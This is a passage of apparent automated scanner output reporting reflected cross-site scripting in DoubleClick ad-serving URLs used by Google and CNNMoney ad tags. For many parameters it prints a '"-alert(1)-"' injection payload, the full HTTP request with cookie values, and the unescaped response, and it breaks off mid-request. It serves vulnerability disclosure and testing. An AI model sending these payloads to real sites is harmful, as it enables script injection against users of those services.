<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590fd738"-alert(1)-"12e78c94558&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151263"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8cf5"-alert(1)-"b71604affcc was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1d8cf5"-alert(1)-"b71604affcc&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=;ord=689417439? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 22 Mar 2011 22:06:04 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 22:06:04 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6910
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... IPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1d8cf5"-alert(1)-"b71604affcc&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151263"); var fscUrl = url; var fscUrlClickTagFound = false; va ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42fe9"-alert(1)-"56fa64cb305 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA42fe9"-alert(1)-"56fa64cb305&client=ca-pub-7832112837345590&adurl=;ord=689417439? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 22 Mar 2011 22:06:14 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 22:06:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6910
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... GAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA42fe9"-alert(1)-"56fa64cb305&client=ca-pub-7832112837345590&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151263"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67ff4"-alert(1)-"f2e94a5331d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5956.Google/B3941858.34;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l67ff4"-alert(1)-"f2e94a5331d&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHoA_sD9QMAgACE&num=1&sig=AGiWqty0PWcuxmskCxJxrSPaXVomLajnfA&client=ca-pub-7832112837345590&adurl=;ord=689417439? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1300849458&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2Ftips&dt=1300831458647&bpp=1&shv=r20101117&jsv=r20110321-2&correlator=1300831458854&frm=2&adk=1180302198&ga_vid=563101533.1300831459&ga_sid=1300831459&ga_hid=801118965&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1042&bih=995&loc=http%3A%2F%2Fwww.tmz.com%2Ftips&fu=0&ifi=1&dtd=211&xpc=vKHtIyAOF6&p=http%3A//www.tmz.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|1831140/746237/15055,998766/1049449/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Tue, 22 Mar 2011 22:05:43 GMT Vary: Accept-Encoding Expires: Tue, 22 Mar 2011 22:05:43 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6910
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/f/170/%2a/c%3B236509780%3B5-0%3B0%3B41471909%3B4307-300/250%3B40692218/40710005/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l67ff4"-alert(1)-"f2e94a5331d&ai=B9tN32RyJTbjRBIPPlQfA5vyODfzBwdwB_MzylhbAjbcB4M_VARABGAEgy5WvEzgAUOO0w5sGYMkGoAHw7Iz1A7IBC3d3dy50bXouY29tugEKMzAweDI1MF9hc8gBCdoBF2h0dHA6Ly93d3cudG16LmNvbS90aXBzuAIYyAKUpN0RqAMB0QNftM276KVd5OgDuAHo ...[SNIP]...
The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f363"-alert(1)-"4bc1b0ca98c was submitted in the AdID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=4852423f363"-alert(1)-"4bc1b0ca98c&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage¶ms.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 23 Mar 2011 19:40:52 GMT Vary: Accept-Encoding Expires: Wed, 23 Mar 2011 19:40:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7584
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... oubleclick.net/click%3Bh%3Dv8/3ad3/f/1df/%2a/g%3B234201586%3B1-0%3B0%3B58104650%3B4307-300/250%3B37901085/37918903/3%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=4852423f363"-alert(1)-"4bc1b0ca98c&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526 ...[SNIP]...
The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ce9"-alert(1)-"4b1d0a00e01 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=35312197ce9"-alert(1)-"4b1d0a00e01&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage¶ms.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 23 Mar 2011 19:40:17 GMT Vary: Accept-Encoding Expires: Wed, 23 Mar 2011 19:40:17 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7456
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... "http://ad.doubleclick.net/click%3Bh%3Dv8/3ad3/f/1df/%2a/o%3B234200935%3B1-0%3B0%3B58104650%3B4307-300/250%3B38590136/38607893/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=35312197ce9"-alert(1)-"4b1d0a00e01&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097 ...[SNIP]...
The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b62df"-alert(1)-"9086fda0f94 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=b62df"-alert(1)-"9086fda0f94 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage¶ms.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7415 Cache-Control: no-cache Pragma: no-cache Date: Wed, 23 Mar 2011 19:42:53 GMT Expires: Wed, 23 Mar 2011 19:42:53 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=b62df"-alert(1)-"9086fda0f94http%3a%2f%2fwww.schwab.com/public/schwab/investment_products/etfs/schwab_etfs%3Fbmac%3Dpqw%26dsid%3Detfx"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; v ...[SNIP]...
The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be89"-alert(1)-"f533e927f7a was submitted in the Segments parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,478055be89"-alert(1)-"f533e927f7a&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage¶ms.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 23 Mar 2011 19:42:05 GMT Vary: Accept-Encoding Expires: Wed, 23 Mar 2011 19:42:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7525
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,478055be89"-alert(1)-"f533e927f7a&Values=1589&Redirect=http%3a%2f%2fcontent.schwab.com/m/q410/swtr/swtr_dsgtld.html%3Fbmac%3Dprd%26dsid%3Dmult"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = "" ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e04b9"-alert(1)-"f9561b8c9c2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896e04b9"-alert(1)-"f9561b8c9c2&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage¶ms.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 23 Mar 2011 19:41:30 GMT Vary: Accept-Encoding Expires: Wed, 23 Mar 2011 19:41:30 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7386
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... click%3Bh%3Dv8/3ad3/f/1df/%2a/o%3B234201805%3B0-0%3B0%3B58104650%3B4307-300/250%3B38588595/38606352/1%3B%3B%7Esscs%3D%3fhttp://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896e04b9"-alert(1)-"f9561b8c9c2&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38 ...[SNIP]...
The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52630"-alert(1)-"90c1f9dbbc4 was submitted in the Values parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=158952630"-alert(1)-"90c1f9dbbc4&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage¶ms.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 23 Mar 2011 19:42:26 GMT Vary: Accept-Encoding Expires: Wed, 23 Mar 2011 19:42:26 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7433
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=158952630"-alert(1)-"90c1f9dbbc4&Redirect=http%3a%2f%2fwww.schwab.com/public/schwab/investment_products/etfs/etf_learning_center%3Fbmac%3Dpqv%26dsid%3Detfx"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque" ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29d71"-alert(1)-"9f040ad00c0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N6036.CNNMoney.com/B5125476.2;sz=300x250;click=http://ads.cnn.com/event.ng/Type=click29d71"-alert(1)-"9f040ad00c0&FlightID=353121&AdID=485242&TargetID=82896&Segments=1637,2244,2245,2729,2743,3083,3285,7044,8598,12257,13088,13090,13303,17251,18904,18910,18961,22176,23793,25344,25508,25512,25535,25538,25550,30220,31691,33074,33097,33128,33526,33852,34172,38423,38816,40223,40773,42274,42703,43109,45351,45497,45604,45611,45692,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=;ord=dhpofrv,bgyutdligxmWA? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: 